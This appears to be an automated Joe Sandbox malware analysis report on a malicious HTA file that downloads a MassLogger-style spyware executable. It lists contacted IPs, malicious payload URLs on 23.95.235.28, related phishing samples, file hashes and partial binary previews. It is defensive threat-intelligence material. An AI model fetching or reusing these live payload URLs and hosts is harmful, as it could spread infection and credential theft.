                                                                                      https://reallyfreegeoip.org/xml/csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        23.95.235.28
                                                                                        		unknownUnited States
                                                                                        		36352AS-COLOCROSSINGUStrue
                                                                                        104.21.96.1
                                                                                        		reallyfreegeoip.orgUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        193.122.130.0
                                                                                        		checkip.dyndns.comUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1640149
                                                                                        Start date and time:2025-03-17 01:17:50 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 58s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:12
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:needagoodplanforsuccesstogetbackbest.hta
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 57
                                                                                        • Number of non-executed functions: 272
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .hta

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        00:18:50Task SchedulerRun new task: {876D3960-16D6-4B12-8542-5AD288769BF3} path: .
                                                                                        20:18:59API Interceptor42x Sleep call for process: powershell.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        23.95.235.28APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
                                                                                        APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
                                                                                        FORMULARZ ODPRAWY CELNEJ DHL.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rmo/needagoodplanforsuccesstogetbackbest.hta
                                                                                        efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 23.95.235.28/60/csso.exe
                                                                                        dok PZ 2025-03-11_142242 fin_Orygina#U0142.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/rc/efs.hta
                                                                                        dok PZ 2025-03-11_142242 fin_Orygina#U0142.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/rc/efs.hta
                                                                                        uhg.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 23.95.235.28/50/csso.exe
                                                                                        Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                        Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                        Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
                                                                                        104.21.96.1ADES_PO_Confirmation_20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                                        • touxzw.ir/sccc/five/fre.php
                                                                                        Transferencia 6997900002017937.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.askvtwv8.top/uztg/
                                                                                        hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.newanthoperso.shop/3nis/?LL=4FHLH&R4lxS2-P=7Jez/f8BRsPhvFRcTYEfxOkzfWBvvrnmo+4qP8uldvbHjjygNPFvdo5E4tKnf+Ij1qWwstrtA/xMUYgdGo9Dw7YPXWw4NGSG4oy32mHU2IUoylmJFg==
                                                                                        yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.sigaque.today/n61y/
                                                                                        A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                                                                        • k1d5.icu/TP341/index.php
                                                                                        DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rbopisalive.cyou/2dxw/
                                                                                        r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.kdrqcyusevx.info/k7wl/
                                                                                        MUH030425.exeGet hashmaliciousAzorultBrowse
                                                                                        • k1d5.icu/TP341/index.php
                                                                                        Invoice Remittance ref20250226.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rbopisalive.cyou/a669/
                                                                                        368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        reallyfreegeoip.orgCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.16.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.80.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.64.1
                                                                                        FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.112.1
                                                                                        TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.80.1
                                                                                        QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                        • 104.21.16.1
                                                                                        checkip.dyndns.comCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 132.226.247.73
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 132.226.247.73
                                                                                        Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 132.226.8.169
                                                                                        FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.130.0
                                                                                        TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                        • 132.226.247.73

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AS-COLOCROSSINGUSverynicegirlgivenmebestwordforgreatnesswithgoodthings.htaGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.95.138
                                                                                        Build.exeGet hashmaliciousStormKittyBrowse
                                                                                        • 23.94.126.116
                                                                                        h2wb5_002.exeGet hashmaliciousDarkVision RatBrowse
                                                                                        • 104.168.28.10
                                                                                        dBKUxeI.exeGet hashmaliciousAsyncRAT, DarkVision RatBrowse
                                                                                        • 104.168.28.10
                                                                                        random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                                                                                        • 107.174.192.179
                                                                                        earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaGet hashmaliciousRemcosBrowse
                                                                                        • 172.245.191.88
                                                                                        goodmanwnatgoodthingsforbesthings.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 192.3.101.146
                                                                                        Our Order.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 198.12.89.24
                                                                                        ienetstatgoodforkissing.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 192.227.228.22
                                                                                        Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 192.227.228.22
                                                                                        CLOUDFLARENETUSJITZq92T28.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.32.1
                                                                                        JITZq92T28.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                        • 172.67.70.233
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        https://apply.atu.ie/_entity/sharepointdocumentlocation/a10f35db-a302-f011-bae2-7c1e524f2423/903e00e6-7542-ee11-bdf3-6045bd8c56d2?file=CONFIDENTIALDoc_Au89994.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                        • 188.114.96.3
                                                                                        jbJFtxTmyS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                        • 172.67.72.57
                                                                                        iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.16.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        ORACLE-BMC-31898USCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.130.0
                                                                                        TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        DHL Shipping Details Ref ID 4466331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        ienetstatgoodforkissing.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 193.122.6.168
                                                                                        7495 P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.130.0
                                                                                        SOA FEB 2025.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        13.03.2025-13.03.2025 shtml.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 158.101.44.242

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        54328bd36c14bd82ddaa0c04b25ed9adCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.96.1
                                                                                        FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                        • 104.21.96.1
                                                                                        shit.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.96.1

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):980992
                                                                                        Entropy (8bit):6.875555651887693
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/u6J33O0c+JY5UZ+XC0kGso6Fa4aL34eprdWY:Ju0c++OCvkGs9Fa4aL341Y
                                                                                        MD5:54DE0C8E192E7BC71B6D284FFF136296
                                                                                        SHA1:F2AB671CBF4229C9C7EA12F01B148E470B6621E7
                                                                                        SHA-256:D274A8FCA173BF675C950AAD9A3D09EF48DCE2522756BC6BEBA0E08DB8DCFC90
                                                                                        SHA-512:5EE16D7EB2ED2B7CF85225ACC2FDB43144581CA54BB171FE129B5F2ABF5E067D1BFE9472616714BB869C7AC3765CCF22873F56F116BBFA6F1CEE37863D35F258
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...y..g.........."..................}............@..........................`............@...@.......@.....................L...|....p...o.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1328
                                                                                        Entropy (8bit):5.398844453842513
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:3KhWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8UHr8Htq:wWSU4y4RQmFoUeWmfmZ9tK8NWR8Wz
                                                                                        MD5:DC919BD1325B842F85F1CD8545CE95E6
                                                                                        SHA1:501D7B8E198022F709FFA12AF4E7D5F190E4BAFE
                                                                                        SHA-256:EF48B744193A91742F2394D682EF24B39BBDFE90FC6B0C5A3C8DE4E54056EFF4
                                                                                        SHA-512:4148554E3ED755D0D797DA8A9591BF6DC35428FD849CC6FDCDD0355D1738F57D3E98BBE7F4108A1705B7C57F570F0514F5FDE822D3DC8A8C2750B1348D05FA8C
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                        C:\Users\user\AppData\Local\Temp\RESEEFD.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Mar 17 01:41:58 2025, 1st section name ".debug$S"
                                                                                        Category:dropped
                                                                                        Size (bytes):1328
                                                                                        Entropy (8bit):3.9898197455367828
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:HVe9EuZfSWXDfHlHwKEbsmfII+ycuZhNFakSjPNnqSqd:cBjziKPmg1ulFa3JqSK
                                                                                        MD5:4E8CF4DFA7060E65F06674D98030E9B6
                                                                                        SHA1:43A29597650FC765FA56E46D21DB5D40C89EC349
                                                                                        SHA-256:1208987462B6A5B48987C1D634F6419CD0B667BCC9BCD6ED29E19F04CA786AEA
                                                                                        SHA-512:2314AA180FCA699AC6C5933F21B67D5E69958E76C30542ADDF388256C0A880D56120E0CE50194446BFCDD1839669629EB9DCCF03759119739216290D9B113ED4
                                                                                        Malicious:false
                                                                                        Preview:L....}.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP....................GG1.Z.U.N.............4.......C:\Users\user\AppData\Local\Temp\RESEEFD.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.g.v.u.r.t.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3oa4ig4i.qnv.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40fbnimg.0ms.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhi2ne1u.h4f.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o52jtwe4.xzx.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\acrorrheuma

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):93696
                                                                                        Entropy (8bit):6.859595316455185
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:zAXKONfuoQTvK0BKTBI4LmIK8AfXEQzFgHI5t348YDXe/l5BnHdFU+kWj9gukGrR:VafuoQTvK0BKTBI4LmIK8AfXEQzFgHGj
                                                                                        MD5:567A6B0C68A61B680EA2ABE4CD4A4BF6
                                                                                        SHA1:9B5554EBC8363BC7B0247D92BD399314EC2A6325
                                                                                        SHA-256:3D43A21F33A7589FF3C7782307FF77026F1D224E31D84F785A75138ED219C5A7
                                                                                        SHA-512:A5DB55CD1D60BB917DC4761953E41CB0D357554E9351C92A620B335B883B7228E649F446ACD3B29539BB3D280C41533AB9180A4E7BBB84B88AF9E0C8EEFAE40C
                                                                                        Malicious:false
                                                                                        Preview:...X72SDHLCX..UH.LSGWGXM.GE3SF9X42SDLLCXWRUHALSGWGXMVGE3SF9X.2SDBS.VW.\.`.R..f.%?4eC!)^*U_s'-"-7#r7-a>&)w.6m....>)]=.?^NhLCXWRUH..SG.F[M.)..SF9X42SD.LAY\S.HA(RGWOXMVGE3..8X4.SDL.BXWR.HAlSGWEXMRGE3SF9X22SDLLCXW.THANSGWGXMTG%.SF)X4"SDLLSXWBUHALSGGGXMVGE3SF9Xd.RD.LCXW.TH.ISGWGXMVGE3SF9X42SDL.BX[RUHALSGWGXMVGE3SF9X42SDLLCXWRUHALSGWGXMVGE3SF9X42SDLlCX_RUHALSGWGXM^gE3.F9X42SDLLCXy&005LSG.%YMVgE3S"8X40SDLLCXWRUHALSGwGX-x56A0F9X.7SDL.BXWTUHA*RGWGXMVGE3SF9Xt2S.b>&481UHMLSGW.YMVEE3S*8X42SDLLCXWRUH.LS.WGXMVGE3SF9X42SD..BXWRUH.LSGUG]M*.E3..9X72SD.LC^..UH.LSGWGXMVGE3SF9X42SDLLCXWRUHALSGWGXMVGE3SF9X.O.K...1$..HALSGWFZNRAM;SF9X42SD2LCX.RUH.LSG`GXMsGE3>F9X.2SD2LCX)RUH%LSG%GXM7GE3.F9X[2SD"LCX)RUH_N{XWGRgpGG.sF9R4..7mLCR.SUHE?qGWM.OVGA@pF9R.1SDH?gXWX.LALW4rGXG.BE3WlcX7.EBLLX7oRUBAO.RQGXV|aE1{.9X>2ybLO.MQRUSknSE.NXMRm.@NF9^.pSDF8JXWP.BALWmIEp.VGO.q8*X46xDfn=LWRQcAfq9BGXI}Go.-P9X0.Snn2TXWV~HkJy%W5.AV7F\2F9^..SDFd.XWTUb{L-IWG\O9.E3Y`.b4..DLJCp.RUNAf.G)tXMRkBM`F9\.$-uLLG.Q*UHG?.GWM}.eGE7{.9X>2y.Ld.XWTU`.LSA

                                                                                        C:\Users\user\AppData\Local\Temp\aut469.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):63822
                                                                                        Entropy (8bit):7.883912543678241
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:8XvTxKrhtlnl6MtPW+ndY7NJIJ4IfkrhW29cRToe/vhJ8UkAq:8fTx4PllM+dumJ4Iak2Oxo+zE1
                                                                                        MD5:349F224257DECA966977066A62BB7BB8
                                                                                        SHA1:DB850D7B43E1BE751573450A62D570FF26A86593
                                                                                        SHA-256:109E7DB35FFBCD28557C12CEA62AAF5115C73349DA3AED014F6B688BBAADDBD7
                                                                                        SHA-512:B43EB613F70549B0CB96D02FE26E8DCF8F2D772202D86859F55476FDAD9A93DB60862E8A781577B64EE5401F321CF60F89023F01DF1178BB8251623D6797DE92
                                                                                        Malicious:false
